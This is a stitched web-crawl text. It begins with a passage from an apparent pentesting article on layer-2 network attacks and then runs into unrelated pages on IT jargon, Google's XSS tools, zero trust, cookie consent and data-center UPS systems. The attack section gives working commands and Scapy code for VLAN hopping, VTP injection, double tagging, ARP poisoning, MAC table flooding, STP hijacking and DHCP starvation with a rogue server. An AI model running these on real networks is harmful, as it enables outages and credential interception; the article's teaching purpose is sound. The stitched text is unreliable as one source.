After this attack, you can see traffic of all VLANs. The performed network reconnaissance has detected VLANs 100, 200, 220, and 250. These VLAN ID values are located in one of the headers of the STP protocol: Root Identifier (Root Bridge System ID Extension).
Now it’s time to create virtual VLAN interfaces, activate them, and request addresses via DHCP. As a result, you’ll be able to communicate with all hosts in all VLANs.
c0ldheim@PWN:~$ sudo vconfig add eth0 100c0ldheim@PWN:~$ sudo vconfig add eth0 200c0ldheim@PWN:~$ sudo vconfig add eth0 220c0ldheim@PWN:~$ sudo vconfig add eth0 250c0ldheim@PWN:~$ sudo ifconfig eth0.100 upc0ldheim@PWN:~$ sudo ifconfig eth0.200 upc0ldheim@PWN:~$ sudo ifconfig eth0.220 upc0ldheim@PWN:~$ sudo ifconfig eth0.250 upc0ldheim@PWN:~$ sudo dhclient -v eth0.100c0ldheim@PWN:~$ sudo dhclient -v eth0.200c0ldheim@PWN:~$ sudo dhclient -v eth0.220c0ldheim@PWN:~$ sudo dhclient -v eth0.250
VTP injections and manipulations with VLAN databases
The VTP protocol was developed to manage VLAN databases on Cisco switches automatically and on a centralized basis. It uses configuration revision numbers that help the switch to determine the most recent VLAN database, receive VTP advertisements, and update the VLAN DB when it sees a higher revision number.
In the VTP domain, switches can play the following roles:
- VTP Server. A switch acting as a VTP Server can create new VLANs, delete old ones, or change information inside VLANs. It also generates VTP advertisements for the rest of the domain members;
- VTP Client. In this capacity, the switch receives special VTP advertisements from other switches in the domain in order to update its VLAN databases. Clients have a limited ability to create VLANs and don’t even have the permission to change the VLAN configuration locally (i.e. have read-only access); and
- VTP Transparent. In this mode, the switch doesn’t participate in VTP processes and can perform full and local administration of the entire VLAN configuration. In the transparent mode, switches only transmit VTP advertisements from other switches without affecting their VLAN configurations. Such switches always have a revision number of zero, and VTP injection attacks cannot be delivered against them.
Advertisement types in the VTP domain:
- Summary Advertisement – a VTP advertisement sent by the VTP server every 300 seconds (5 minutes). This advertisement contains the VTP domain name, protocol version, timestamp, and MD5 hash of the configuration;
- Subset Advertisement – a VTP advertisement sent every time the VLAN configuration is changed; and
- Advertisement Request – a request from a VTP client to a VTP server for a
message. It is usually sent in response to a message that the switch has discovered aAdvertisement Summary
with a higher configuration revision number.Advertisement
To attack a VTP domain, the port you are connected to during the attack must be in the trunk channel mode. By the way, attacking the VTP can be the next step after you’ve attacked the DTP protocol and became a trunk link. An attacker can make VTP injections and send allegedly ‘updated’ VLAN databases with higher revision numbers. As a result, legitimate switches will receive and update their VLAN databases. Using Yersinia, I will show how to deliver an attack on VTPv1 and delete all VLANs.
Yersinia will generate special VTP advertisements: Summary
As you can see, after the attack, all VLANs created by the user have been deleted. VLAN 1 and VLANs in the range 1002-1005 were not deleted because they are always created by default.
Double tagging attack
The double tagging attack exploits 802.1Q encapsulation features in Ethernet networks. In most cases, switches execute only one layer of the process: 802.1Q decapsulation. This opens the way for exploitation since this feature enables the hacker pentester to hide the second 802.1Q tag in an Ethernet frame.
Attack details are as follows:
- The attacker assembles an Ethernet frame with two tags and sends it towards the switch. The VLAN ID of the first 802.1Q tag must match the Native VLAN of the port operating in the trunk mode. For convenience, imagine that the first 802.1Q tag is VLAN 1; while the second 802.1Q tag is VLAN 100;
- The frame is received by switch SW 1. The switch checks the first four bytes of the 802.1Q tag. The switch sees that the frame is intended for VLAN 1, and VLAN 1 in its configuration is the Native VLAN. Switch SW1 destroys this tag. Concurrently, the second VLAN 100 tag remains intact and doesn’t disappear; and
Native VLAN is a special VLAN, and the switch associates all frames without an 802.1Q tag with it. The default Native VLAN ID is 1.
- Switch SW2 checks only the internal 802.1Q tag and sees that the frame is intended for VLAN 100. This switch sends the frame to the port that belongs to VLAN 100, and the frame reaches its destination.
I will use Scapy to assemble an Ethernet broadcast frame with two 802.1Q tags. To visualize how the frame reaches its destination and responds to the spoofed ICMP request, an ICMP layer will be added. Then I send this request – allegedly, from the Nefarian PC whose IP address is 10.10.200.1.
>>> frame = Ether(dst="FF:FF:FF:FF:FF:FF")>>> first_DOT1Q_tag = Dot1Q(vlan=1)>>> second_DOT1Q_tag = Dot1Q(vlan=100)>>> ip_packet = IP(src="10.10.200.1", dst="10.10.100.1")>>> icmp_layer = ICMP()>>> crafted = frame / first_DOT1Q_tag / second_DOT1Q_tag / ip_packet / icmp_layer>>> sendp(crafted, iface="eth0", count=40, loop=0, verbose=1)
As you can see, the packet has reached the destination host, but with only one VLAN ID 100 tag (because the first VLAN 1 tag was destroyed by the first SW1 switch). Note that this is a single-direction attack. It can be useful when you attack the DMZ segment in the course of a pentesting study.
Network reconnaissance and traffic interception with ARP
The ARP protocol can be extremely useful in network reconnaissance. An ARP scan enumerates active hosts and has a slight advantage over ICMP scans because ICMP traffic can be restricted or even disabled on a corporate network.
The problem with ARP scanning is that this network reconnaissance technique is very ‘noisy’. Using it, it’s important to ensure that you don’t alarm the IPS/IDS security systems. In addition, Storm Control on the port you are connected to can be configured to block this port in case of abnormal broadcast traffic (ARP uses broadcast traffic).
Using ARPScanner.py, you can identify active hosts on the 10.1.1.0/24 network and their MAC addresses. In my case, the test network is small, but still…
c0ldheim@PWN:~$ sudo python3 ARPScanner.py -t 10.1.1.0/24 -i eth0
ARP cache poisoning
This network attack exploits weaknesses of the ARP protocol. Any host on the network can send and receive ARP requests; they do this without any authentication (there is no authentication mechanism in the ARP protocol); so, all hosts trust each other. The attacker sends bogus ARP responses towards target A and target B. Using forged ARP responses, the attacker’s computer is positioned as target A for target B and vice versa, thus, squeezing in the middle. This creates conditions for traffic interception.
The picture below shows how ARP cache poisoning works.
To implement this attack, I have to switch my interface to the promiscuous mode and enable forwarding between interfaces. Otherwise, the two hosts will lose connectivity between themselves: the traffic will go via my PC without forwarding between interfaces.
c0ldheim@PWN:~$ ifconfig eth0 promiscc0ldheim@PWN:~$ sudo sysctl -w net.ipv4.ip_forward=1
Using the script ARPSpoofer.py, I launch the ARP poisoning process. As the first target, I specify a Windows PC whose IP address is 10.1.1.2; as the second one, an FTP server whose address is 10.1.1.5.
c0ldheim@PWN:~$ sudo python3 ARPSpoofer.py -t1 10.1.1.2 -t2 10.1.1.5 -i eth0
After that, I can start listening the network traffic.
Content-addressable memory overflow on a switch
Sometimes, this attack is referred to as MAC address table overflow. The idea is to overflow the interconnect matrix. As a result, the switch, turns into a ‘hub’ and starts sending incoming frames to all ports, thus, providing ideal conditions for traffic interception. It’s very easy to cause such an overflow because the size of MAC address tables on switches is limited. If the MAC address table is full, the attacker can see all frames sent from all ports.
I will use Scapy to demonstrate this attack. A randomized MAC address will be used as the source MAC address (i.e. each new generated frame will have a new MAC address). The same applies to destination MAC addresses.
Next, using the sendp
method, I send malicious Ethernet frames. By setting loop
, I loop the operation sending out these frames.
>>> malicious_frames = Ether(src=RandMAC(), dst=RandMAC()) >>> sendp(malicious_frames, iface="eth0", loop=1, verbose=1)
MAC address table on the switch before the attack:
CoreSW#show mac address-table count
Mac Entries for Vlan 1:---------------------------
Dynamic Address Count : 3
Static Address Count : 0
Total Mac Addresses : 3
Total Mac Address Space Available: 7981
MAC address table on the switch after the attack:
CoreSW#show mac address-table count
Mac Entries for Vlan 1:---------------------------
Dynamic Address Count : 7981
Static Address Count : 0
Total Mac Addresses : 7981
Total Mac Address Space Available: 7981
As long as the MAC address table isn’t full, the Switch will forward all frames from all ports using broadcasting.
STP root hijacking
How STP works
STP is required to ensure fault tolerance of a computer network at the data link level. It blocks redundant channels to avoid a broadcast storm on the network. In my opinion, STP is an outdated L2 level fault tolerance technique, especially taking into account the existence of the switching link aggregation system and the Storm Control technology.
When an STP topology is assembled, a special root switch (i.e. root bridge) is assigned. Its selection is based on a special priority value (by default, it’s 32768). All switches in the STP domain have the same value; therefore, the choice is determined by adding together the following parameters:
- priority value 32768; and
- MAC address of the switch.
The switch whose MAC address is lower becomes the root switch. Network device manufacturers assign MAC addresses to their products in sequence. The older is the device, the lower is its MAC address. As a result, some ancient switch often becomes the root switch in production! 🙂 Of course, this adversely affects the network bandwidth.
After selecting the root switch, the remaining switches select ports that look towards the root switch. They are used for traffic forwarding. Then ports that will be blocked at the logical level are selected. This is how STP prevents the formation of a switching ring that causes a broadcast storm.
But if a new switch whose priority is lower than the priority of the current root switch suddenly appears in the STP domain, a new root switch must be selected. In other words, legitimate network traffic can be intercepted by changing the STP topology.
First, I switch my physical interfaces to the promiscuous mode, create a bridge called br-evil
, and assign two interfaces, eth0
, to this bridge:
c0ldheim@PWN:~$ sudo ifconfig eth0 promiscc0ldheim@PWN:~$ sudo ifconfig eth1 promiscc0ldheim@PWN:~$ sudo brctl addbr br-evilc0ldheim@PWN:~$ sudo brctl addif br-evil eth0c0ldheim@PWN:~$ sudo brctl addif br-evil eth1c0ldheim@PWN:~$ sudo ifconfig br-evil promiscc0ldheim@PWN:~$ sudo ifconfig br-evil up
Then I enable traffic forwarding between the interfaces.
c0ldheim@PWN:~$ sudo sysctl -w net.ipv4.ip_forward=1
Scapy is required to assemble a special STP frame. I import the module required to work with L2 protocols.
>>> from scapy.layers.l2 import *
Then I assemble the required STP frame with the lowest MAC address values in the src
, and bridgemac
variables. And finally, I loop the operation sending out this frame every 3 seconds:
>>> frame = Ether(src="00:00:00:00:00:11", dst="01:80:C2:00:00:00")>>> frame /= LLC()/STP(rootmac="00:00:00:00:00:11", bridgemac="00:00:00:00:00:11")>>> sendp(frame, iface="br-evil", inter=3, loop=1, verbose=1)
STP uses the multicast MAC address 01:
to broadcast TCN service messages.
After sending out the crafted frame, I see STP TCN messages. Switches in the STP domain use them to exchange service information with each other.
STP status on switch SW1 after the attack:
VLAN0001 Spanning tree enabled protocol rstp Root ID Priority 32769 Address 5000.0007.0000 Cost 4 Port 1 (GigabitEthernet0/0) Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) Address 5000.0008.0000 Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec Aging Time 300 secInterface Role Sts Cost Prio.Nbr Type------------------- ---- --- --------- -------- --------------------------------Gi0/0 Root FWD 4 128.1 ShrGi0/1 Desg FWD 4 128.2 ShrGi0/2 Desg FWD 4 128.3 ShrGi0/3 Desg FWD 4 128.4 ShrGi1/0 Desg FWD 4 128.5 ShrGi1/1 Desg FWD 4 128.6 ShrGi1/2 Desg FWD 4 128.7 ShrInterface Role Sts Cost Prio.Nbr Type------------------- ---- --- --------- -------- --------------------------------Gi1/3 Desg FWD 4 128.8 Shr
STP status on switch SW2 after the attack:
VLAN0001 Spanning tree enabled protocol rstp Root ID Priority 32769 Address 5000.0007.0000 Cost 8 Port 1 (GigabitEthernet0/0) Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) Address 5000.0009.0000 Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec Aging Time 300 secInterface Role Sts Cost Prio.Nbr Type------------------- ---- --- --------- -------- --------------------------------Gi0/0 Root FWD 4 128.1 ShrGi0/1 Altn BLK 4 128.2 ShrGi0/2 Desg FWD 4 128.3 ShrGi0/3 Desg FWD 4 128.4 ShrGi1/0 Desg FWD 4 128.5 ShrGi1/1 Desg FWD 4 128.6 ShrGi1/2 Desg FWD 4 128.7 ShrInterface Role Sts Cost Prio.Nbr Type------------------- ---- --- --------- -------- --------------------------------Gi1/3 Desg FWD 4 128.8 Shr
STP status on switch SW3 after the attack:
VLAN0001 Spanning tree enabled protocol rstp Root ID Priority 32769 Address 5000.0007.0000 Cost 4 Port 1 (GigabitEthernet0/0) Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) Address 5000.000a.0000 Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec Aging Time 300 secInterface Role Sts Cost Prio.Nbr Type------------------- ---- --- --------- -------- --------------------------------Gi0/0 Root FWD 4 128.1 ShrGi0/1 Altn BLK 4 128.2 ShrGi0/2 Desg FWD 4 128.3 ShrGi0/3 Desg FWD 4 128.4 ShrGi1/0 Desg FWD 4 128.5 ShrGi1/1 Desg FWD 4 128.6 ShrGi1/2 Desg FWD 4 128.7 ShrInterface Role Sts Cost Prio.Nbr Type------------------- ---- --- --------- -------- --------------------------------Gi1/3 Desg FWD 4 128.8 Shr
Now the traffic will go through my computer. For clarity purposes, I initiate ICMP requests from the computer whose IP address is 10.1.1.100 to the computer whose IP address is 10.1.1.200.
As you can see, such a relatively simple technique makes it possible to intercept traffic. Importantly, there are no visible signs of an attack for legitimate hosts.
VLAN ID enumeration
A captured STP frame makes it possible to understand which VLAN you are in. VLAN ID information is located in the Root Identifier header (Root Bridge System ID Extension). Its value is equivalent to the VLAN ID value on the port you are connected to.
DHCP starvation and spoofing
During this attack, you send a huge number of DHCPDISCOVER
messages to exhaust the address space on the DHCP server. The DHCP server responds to each request and issues an IP address. Once the address space is full, the DHCP server will no longer be able to serve new clients on its network by issuing IP addresses to them (i.e. a denial of service occurs).
Let’s test this attack on a small local network. The DHCP server is already configured on the GW router. Subnet: 10.1.1.0/24.
Using Scapy, I start sending bogus DHCPDISCOVER
messages. The broadcast addresses are used as the destination MAC address and destination IP address. I have to add the UDP protocol layer since DHCP uses it. In the options
template, I indicate that I will send DHCP packets of the DISCOVER
type. And at the end, I loop the infinite flood of generated frames.
>>> malicious_dhcp_discover = Ether(src=RandMAC(), dst="FF:FF:FF:FF:FF:FF") >>> malicious_dhcp_discover /= IP(src="0.0.0.0",dst="255.255.255.255") >>> malicious_dhcp_discover /= UDP(sport=68, dport=67) >>> malicious_dhcp_discover /= BOOTP(op=1, chaddr = RandMAC()) >>> malicious_dhcp_discover /= DHCP(options=[('message-type', 'discover'),('end')]) >>> sendp(malicious_dhcp_discover, iface="eth0", loop=1, verbose=1)
Success! The DHCP server has been disabled, and you can start creating its bogus counterpart.
After disabling the legitimate DHCP server, you can deploy a rogue DHCP server on your side and declare it the default gateway. When a DHCP server issues IP addresses to hosts on a network, it also transmits information about the IP address of the default gateway. Therefore, I configure my rogue DHCP server so that my IP address is specified as the default gateway. The client receives this address after sending a request to me; I become the default gateway on its side; and from now on, the client will send its packets to me.
I use Yersinia, to deploy a rogue DHCP server.
Next, I use two commands to initiate an IP address update on the Windows 10 PC (in other words, I try to get an address from my rogue DHCP server):
C:\Windows\system32> ipconfig /releaseC:\Windows\system32> ipconfig /renew
As you can see, the client received the IP address of the default gateway and information about it. Now I can try to intercept traffic since all the client’s traffic goes to me.
I switch the interface to the promiscuous mode and allow traffic forwarding on the interface:
c0ldheim@PWN:~$ sudo ifconfig eth0 promiscc0ldheim@PWN:~$ sudo sysctl -w net.ipv4.ip_forward=1
As a result, I was able to intercept unencrypted FTP traffic with the following credentials: nightmare:
In this article, I have analyzed most of the attack scenarios targeting the data link layer of a computer network. Based on my personal pentesting experience, I can say that admins very often don’t pay due attention to L2 layer protocols and leave their default configurations intact. This, as you can see, can be exploited by an attacker.
In these recent times, L2 attacks have lost their actuality and gone out of fashion: very few people pay attention to them. Hopefully, this article will provide pentesters with new attack vectors and help network engineers to raise the security of their networks. | <urn:uuid:2ee46a36-b9f6-4002-b0f5-c75dd6dc18c9> | CC-MAIN-2024-38 | https://hackmag.com/security/ethernet-abyss/ | 2024-09-15T01:11:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00592.warc.gz | en | 0.82604 | 6,984 | 2.953125 | 3 |
Datafication: We know that data is increasing at an amazing rate datafication is the process through which businesses take information from people’s every-day lives and turn it into useful business data. The use of social media is a great example. It has become fairly common for businesses to use social media to determine personality characteristics of potential employees, replacing the personality tests that have been in use for many years. The use of social media has been proven to be more accurate. The accumulation of this data is often best accomplished through the Cloud.
Decentralized Cryptocurrency: No, it’s not something you would find in a cemetery. And, yes, cryptocurrency has developed something of an “underground” reputation as a form of payment that is used for nefarious purposes on the “dark web”, (not entirely undeserved) but in actuality, they are virtual “currencies”, meaning there are no physical representations, like bills or coins. Think of it like this: when you pay your credit card bill online, no one is going to a bank vault and taking a pile of dollar bills and transferring it from your money shelf to the credit card company’s money shelf. It is all done electronically. If, however, you wanted to walk into your credit card company’s office and hand them a stack of bills, they would take it. Cryptocurrency is like this except there is no hard currency alternative. You do buy your cryptocurrency (e.g. Bitcoin) with real money electronically, but after that, all transactions only take place over the Internet.
Gamification: Every day, as more young people enter the workforce, a larger and larger percentage of the nation’s employed grew up with video gaming as a major source of entertainment. Many employers, especially those that tend to employ younger people, have discovered that setting goals based on gaming protocols, rather than standard targets, prove more effective. For example, every sale completed may result is the awarding of “experience points”, and upon receiving a certain number of points, the employee “levels up” (reaching the next plateau.) When reaching a pre-set level, a cash or other prize is awarded. In other words, this is the “gamification” of goal setting.
Machine Learning: Machine learning is a function of AI, or Artificial Intelligence. What this means is that a computer gathers data from a variety of sources and then creates algorithms that uses this data to develop reliable predictions. This can help a business learn more about existing and potential clients needs and, thereby, increase the likelihood of making the sale.
Microservices: Microservices come from a form of software architecture in which easy piece of functionality is created as a separate program so as to be effectively independent of the other pieces. If a software customer needs a single piece of software functionality, they can purchase just that program and tie it together with similar standalone programs created by other software developers to end up with exactly the total functionality they need without having to have unique software written for them.
Open-Source: Open Source programs are those that are free and modifiable, and that can be used by anyone who wants to build an application around it. The use of open-source programs make the development of custom programs for small businesses affordable.
We hope these posts on terminology has been helpful. If there are any other terms, or anything at all about IT solutions or IT support that you are curious about, please feel free to speak with one of our team members at 678.373.0716, or visit us at www.DynaSis.com. | <urn:uuid:048e178d-4292-4980-8a6e-2a6605278d3d> | CC-MAIN-2024-38 | https://dynasis.com/uncategorized/tech-terms-every-smb-understand-part-2/ | 2024-09-16T06:29:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00492.warc.gz | en | 0.962781 | 751 | 2.78125 | 3 |
Tech giant Google has issued tools to help web developers identify and mitigate cross-site scripting vulnerabilities, one of the most common forms of hacking attacks.
Servers that host websites, which run advertisements or any other imported content, must be able to accept HTML and other programming from outside sources. But that creates a way in which hackers can load malicious code into a website and attack anyone who even visits the site. Google recently found that 95 percent of one billion websites recently scanned by the company were vulnerable to XSS attacks, allowing hackers to load malicious code onto the computers of anyone who visited their page.
One such XSS attack is called a drive-by download. Because of the way browsers work — especially with the way autoplay video and audio content works — the unsuspecting visitor doesn’t even have to click on anything to become infected. Drive-by downloads enable watering-hole attacks, where hackers aiming at a highly secure enterprise will target an outside website that employees frequently visit.
For website developers, the answer to XSS is a content security policy, or CSP — essentially a set of instructions that tells the web server which programming inputs can be trusted.
But, wrote Google engineers in a blog post Monday launching the new tools, “In a recent Internet-wide study we analyzed over 1 billion domains and found that 95 percent of deployed CSP policies are ineffective as a protection against XSS” because they were poorly configured.
The tools — CSP Evaluator and CSP Mitigator — are designed to help website developers check that their CSP settings are correct. The engineers also suggest the use of the “nonce” — a one-time encryption code that validates an input from an outside source. | <urn:uuid:1ef158ab-a9b3-4af7-8180-a88a8d3b16e9> | CC-MAIN-2024-38 | https://develop.fedscoop.com/google-xss-cross-site-scripting-fix/ | 2024-09-19T23:38:02Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00192.warc.gz | en | 0.948848 | 353 | 2.640625 | 3 |
Zero trust is a newer security model that assumes that all users and devices, whether inside or outside of an organization’s network, are untrusted and must be authenticated and authorized before they are granted access to resources. Zero trust aims to protect against cyber threats, such as data breaches and malware attacks, by eliminating the assumption that users and devices within an organization’s network are trustworthy.
One of the key principles of zero trust is the idea of “never trust, always verify.” This means that every request for access to a resource, whether it comes from a user within the organization or from an external device, must be verified before access is granted. This is in contrast to traditional security models, which often assume that users and devices within an organization’s network are trusted, and only external threats must be guarded against.
To implement a zero trust model, organizations typically use a variety of security controls, including multi-factor authentication, network segmentation, and application-level access controls. These controls are used to verify the identity of users and devices and ensure that they are authorized to access specific resources.
One of the key benefits of zero trust is that it helps to protect against insider threats, such as employees who may have malicious intentions or who may accidentally expose sensitive data. By requiring all users to be authenticated and authorized before they are granted access to resources, zero trust can prevent these types of threats from causing damage.
Another benefit of zero trust is that it can help organizations to comply with regulations and industry standards, such as both the Payment Card Industry Data Security Standard (PCI DSS) and the Health Insurance Portability and Accountability Act (HIPAA). These regulations often require organizations to implement robust security measures to protect against data breaches and other cyber threats.
There are also some challenges associated with implementing a zero trust model. One of the main challenges is the complexity of the model, which requires organizations to implement and manage a variety of security controls and processes. This can be time-consuming and resource-intensive, and may require organizations to invest in additional security infrastructure and staff.
Another challenge is the potential impact on user experience. By requiring users to authenticate and authorize their access to resources, zero trust can add an extra layer of complexity to the process of accessing and using these resources. This may be particularly problematic for organizations that rely on many remote or mobile users, who may be less willing to tolerate the added security measures.
Despite these challenges, many organizations are adopting zero trust as a way to better protect against cyber threats. According to a survey by Forrester, 71% of organizations that have implemented zero trust reported a significant reduction in security incidents, while 79% reported an improvement in the overall security posture of their organization.
Overall, zero trust is a security model that is well-suited to the modern threat landscape, which is characterized by a proliferation of cyber threats and an increasing reliance on remote and mobile users. While implementing zero trust can be challenging, the benefits of increased security and compliance make it a worthwhile investment for many organizations. | <urn:uuid:fe94f17f-2738-405c-96df-06fb317874bf> | CC-MAIN-2024-38 | https://cyberexperts.com/zero-trust-explained-in-simple-terms/ | 2024-09-07T20:57:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00392.warc.gz | en | 0.950857 | 625 | 2.90625 | 3 |
Cookie consent opt-ins are a key aspect of today’s digital landscape, playing a vital role in user privacy and website compliance. Understanding their significance helps build trust and transparency with your audience.
A cookie consent opt-in means your website needs visitors' permission to place cookies on their browser. This informs users about data collection and requires explicit consent, ensuring compliance with privacy laws and protecting user data before tracking their online activity.
In other words, cookie consent opt-in forms are used to obtain consent from website visitors before enabling all cookies to act during a session. This is a necessary step that businesses must add to their websites under the General Data Protection Regulation (GDPR).
It upholds consumer’s rights to have control over the information that’s collected from them, limiting how businesses store, use, and sell their data. Through a cookie consent opt-in, consumers permit businesses to process their information through the use of website cookies, whether for functional analytics, marketing, or other related purposes.
To understand what cookie opt ins are, it's essential to first understand cookies themselves. Let's quickly cover the basics.
“Cookies” are texts that computers receive and send to track user activity. These are basic components of web browsing; developers use them to improve the online experience. However, depending on how cookies behave, they can also be a risk to user privacy.
There are three main kinds of cookies:
First-party cookies are created by and stored on the website or domain that a user is visiting. They are created to track user activity and preferences on a single website during a single session, optimizing the browsing experience. First-party cookies do not jump from one website or domain to another, and their work is done once the user terminates the session.
Second-party cookies aren’t technically a category of their own. These are just first-party cookies that are shared, exchanged, or sold between businesses under a data partnership or contract.
Third-party cookies are created and set by programs not owned or controlled by the website or domain that a user is visiting. They’re often used for advertising, marketing, and re-targeting, and they’re often placed on advertisements.
Third-party cookies track user activity from site to site over a long period. Third-party cookies are the kind that are often referenced in data privacy laws since these are the most invasive.
Now that you understand the basics, let's get back to cookie opt ins specifically.
Generally, cookies are harmless. A lot of them are used to optimize website functions, while others are used to personalize marketing efforts.
This is why data privacy laws implore businesses to obtain consent from users before employing cookies or to give consumers the option to opt out of the sale of any information collected from them through cookies.
Businesses, then, must comply with set regulations to avoid hefty fines and the loss of businesses in key markets like Europe and the United States.
To comply with the GDPR, businesses must obtain opt-in cookie consent from website visitors. To ensure this, it’s important to first block all cookies before getting consent by either turning off all cookies, hard-coding your website with cookie blocking scripts, or turning on cookie blocking plug-ins.
It also provides details about the types of active cookies and their purpose, any third parties that may employ cookies on the site, and how consumers can customize the cookies enabled during their session.
For businesses doing business in the United States, or at least in the state of California, websites must provide opt-out options, instead, under the California Consumer Privacy Act (CCPA). It’s similar to opt-in cookie consent in that it provides the necessary information to consumers about cookies. But the option is given as to whether or not a user consents to the sale of their personal information collected by cookies. Just in case you are asking yourself: “do I have to comply with CCPA?”, click on the link to find out.
Opting in to cookies allows for a personalized browsing experience with tailored content and ads, but it involves sharing more data. Opting out enhances privacy by limiting data collection but may result in less relevant content. Choose based on your privacy preferences and browsing needs.
Data privacy laws can be confusing. But the safest practice is to comply with all regulations, ensuring that consumer rights are upheld and prioritized at every step. For businesses complying with the GDPR, this starts with obtaining cookie opt-in consent from website visitors.
Meanwhile, for businesses under the CCPA, this begins with giving users the option to opt out of the sale of their information. Either way, what’s important is to give consumers the proper information about cookies and the avenue to control how their data is collected, used, and sold.
Contact Ketch’s team of privacy experts today to learn more about a consent management solution for your business.
Try out Ketch Free and start collecting consent in 5 minutes or less | <urn:uuid:613a1fcb-3a66-44fc-afd6-a8639c28aedc> | CC-MAIN-2024-38 | https://www.ketch.com/blog/posts/what-is-a-cookie-consent-opt-in | 2024-09-10T08:25:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00192.warc.gz | en | 0.944378 | 1,038 | 3.09375 | 3 |
Uninterruptible Power Supply (UPS) systems play a critical role in ensuring the uninterrupted operation of data centers. In the event of a power outage or other power-related issues, a UPS provides backup power to keep the data center running smoothly. In this article, we will explore the importance of UPS in data centers, different types of UPS systems, and factors to consider when choosing a UPS solution.
Related Link: Basic Tripping Settings for Circuit Breakers to Know
The Importance of UPS in Data Centers
Data centers house and operate mission-critical infrastructure, including servers, storage systems, networking equipment, and more. Any disruption in the power supply can have severe consequences, leading to data loss, system downtime, and financial losses. UPS systems act as a safeguard against these risks by providing uninterrupted power to the equipment during power outages, voltage fluctuations, or other power disturbances.
Preventing Data Loss: Data centers store vast amounts of valuable data, and sudden power interruptions can result in data corruption or loss. UPS systems give data center operators a critical window of time to gracefully shut down equipment and safely store data, mitigating the risk of data loss.
Minimizing Downtime: Downtime can have significant financial implications for businesses relying on data center services. UPS systems provide immediate backup power, allowing data center operators to continue operations seamlessly during power outages. This helps maintain productivity, customer satisfaction, and business continuity.
Protecting Equipment: Power disturbances such as surges, spikes, and voltage fluctuations can damage sensitive electronic equipment. UPS systems act as a line of defense, offering surge protection and voltage regulation to prevent equipment damage and premature failure.
Seeking guidance on integrating technology into your business? Let us provide you with the assistance you need. Contact us today!
Types of UPS Systems
There are several types of UPS systems available, each offering different levels of protection and functionality. Understanding the differences between these types can help data center operators choose the most suitable UPS solution for their specific needs.
- Standby UPS: Standby UPS systems are the most basic type and are commonly used for workstations or small-scale applications. They provide backup power by mechanically switching to battery power when a power failure occurs. Standby UPS systems are typically non-configurable and offer limited features.
- Line-interactive UPS: Line-interactive UPS systems offer more advanced features compared to standby UPS systems. They can handle not only power outages but also short-term under-voltages or over-voltages. Line-interactive UPS systems use an autotransformer to adjust the output voltage, providing smoother power delivery to connected equipment.
- Online Double-Conversion UPS: Online double-conversion UPS systems provide the highest level of power protection and are commonly used in data centers. These UPS systems continuously regenerate clean AC power through a continuous-duty inverter, seamlessly transitioning between the mains power and battery power. They offer superior protection against power fluctuations, ensuring that connected equipment receives conditioned and regulated power.
Choosing the Right UPS Solution
When selecting a UPS solution for a data center, several factors should be considered to ensure optimal performance and reliability.
- Capacity and Scalability: Assess the power requirements of the data center and choose a UPS system with sufficient capacity to support the load. Additionally, consider scalability options to accommodate future growth or increased power demands.
- Battery Life: The battery life of a UPS system is a critical factor to consider. Different UPS systems have varying battery life, and it is important to choose a system that aligns with the desired backup duration and operational needs. Valve-regulated lead-acid (VRLA) batteries, commonly used in UPS systems, typically have a lifespan of 3 to 5 years.
- Redundancy and Fault Tolerance: To ensure maximum uptime, consider UPS systems with built-in redundancy and fault tolerance features. Redundant UPS configurations, such as N+1 or 2N redundancy, allow for seamless power transfer in case of a UPS failure or maintenance. This ensures that critical equipment remains powered even during UPS maintenance or component failures.
- Efficiency and Energy Savings: UPS systems are not only responsible for providing backup power but also for ensuring efficient power delivery. Look for UPS systems with high-efficiency ratings, such as those certified by ENERGY STAR or with high-efficiency levels, to minimize energy consumption and reduce operating costs.
- Monitoring and Management Capabilities: Advanced UPS systems offer monitoring and management features that provide real-time visibility into power usage, battery status, and system health. These features allow data center operators to proactively monitor UPS performance, identify potential issues, and take necessary actions to ensure continuous operation.
- Maintenance and Serviceability: Consider the ease of maintenance and serviceability when selecting a UPS system. Look for UPS models that provide easy access to components, hot-swappable batteries, and user-friendly interfaces for configuration and troubleshooting. This can significantly reduce downtime during maintenance or repair activities.
- Integration with Power Distribution Infrastructure: Ensure compatibility and seamless integration of the UPS system with existing power distribution infrastructure in the data center. Consider factors such as input/output voltage requirements, connectivity options, and compatibility with other power management systems.
Related Link: How to Calculate Data Center Cooling Needs
Battery Monitoring and Maintenance
Proper monitoring and maintenance of UPS batteries are crucial for ensuring their reliability and longevity. Regular battery inspections, testing, and preventive maintenance can help identify potential issues before they lead to unexpected failures. Monitoring the battery health, temperature, and voltage levels can provide valuable insights into their condition and allow data center operators to take proactive measures.
Battery replacement should be planned in accordance with manufacturer recommendations or based on battery performance indicators. Regularly scheduled battery replacements help prevent unexpected downtime and ensure that the UPS system can provide the intended backup power when needed.
Additionally, it is essential to establish proper battery storage conditions, including temperature and humidity control, to extend battery life. Implementing battery management software or systems can aid in monitoring battery health, predicting failures, and optimizing battery performance.
By paying close attention to battery monitoring and maintenance, data center operators can maximize the reliability of their UPS systems, minimize the risk of power interruptions, and effectively protect critical infrastructure, contributing to a robust and resilient data center environment.
Looking for new tech solutions? Contact us today!
The Crucial Role of UPS in Data Centers
